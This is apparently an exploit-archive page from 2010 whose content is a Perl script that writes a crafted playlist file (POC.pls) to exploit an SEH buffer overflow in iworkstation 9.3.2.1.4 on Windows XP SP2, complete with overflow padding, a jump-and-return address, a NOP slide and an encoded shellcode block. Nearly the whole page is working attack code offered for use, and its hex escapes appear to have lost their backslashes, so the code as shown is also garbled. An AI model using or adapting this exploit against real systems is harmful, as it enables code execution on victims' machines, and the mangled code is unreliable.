iworkstation Version 9.3.2.1.4 seh exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : iworkstation Version 9.3.2.1.4 seh exploit
# Published : 2010-09-27
# Author : sanjeev gupta
# Previous Title : Digital Music Pad Version 8.2.3.3.4 SEH overflow Metasploit Module
# Next Title : AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit

#iworkstation Version 9.3.2.1.4 seh exploit
#Author Sanjeev Gupta san.gupta86[at]gmail.com
#Download Vulnerable application from http://www.sharewareplaza.com/iworkstation-downloads_68989.html
#Vulnerable version iworkstation Version 9.3.2.1.4
#Tested on XP SP2
#Greets Puneet Jain


my $head = "x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Dx0Ax46x69x6Cx65x31x3D";
my $buff = "x41" x 260;
my $buff1= "xebx06x90x90";
my $buff2 = pack('V',0x73421DEF);                          #73421DEF   5E               POP ESI

my $slide = "x90" x 12;
my $code =
"xDBxDFxD9x74x24xF4x58x2BxC9xB1x33xBA".
"x4CxA8x75x76x83xC0x04x31x50x13x03x1CxBBx97x83x60".
"x53xDEx6Cx98xA4x81xE5x7Dx95x93x92xF6x84x23xD0x5A".
"x25xCFxB4x4ExBExBDx10x61x77x0Bx47x4Cx88xBDx47x02".
"x4AxDFx3Bx58x9Fx3Fx05x93xD2x3Ex42xC9x1Dx12x1Bx86".
"x8Cx83x28xDAx0CxA5xFEx51x2CxDDx7BxA5xD9x57x85xF5".
"x72xE3xCDxEDxF9xABxEDx0Cx2DxA8xD2x47x5Ax1BxA0x56".
"x8Ax55x49x69xF2x3Ax74x46xFFx43xB0x60xE0x31xCAx93".
"x9Dx41x09xEEx79xC7x8Cx48x09x7Fx75x69xDExE6xFEx65".
"xABx6Dx58x69x2AxA1xD2x95xA7x44x35x1CxF3x62x91x45".
"xA7x0Bx80x23x06x33xD2x8BxF7x91x98x39xE3xA0xC2x57".
"xF2x21x79x1ExF4x39x82x30x9Dx08x09xDFxDAx94xD8xA4".
"x05x77xC9xD0xADx2Ex98x59xB0xD0x76x9DxCDx52x73x5D".
"x2Ax4AxF6x58x76xCCxEAx10xE7xB9x0Cx87x08xE8x6Ex46".
"x9Bx70x5FxEDx1Bx12x9F";



my $buff4 = "x90" x 20000;
my $file = "POC.pls";

open ($File,">$file");
print  $File $head.$buff.$buff1.$buff2.$slide.$code.$buff4;
close($File)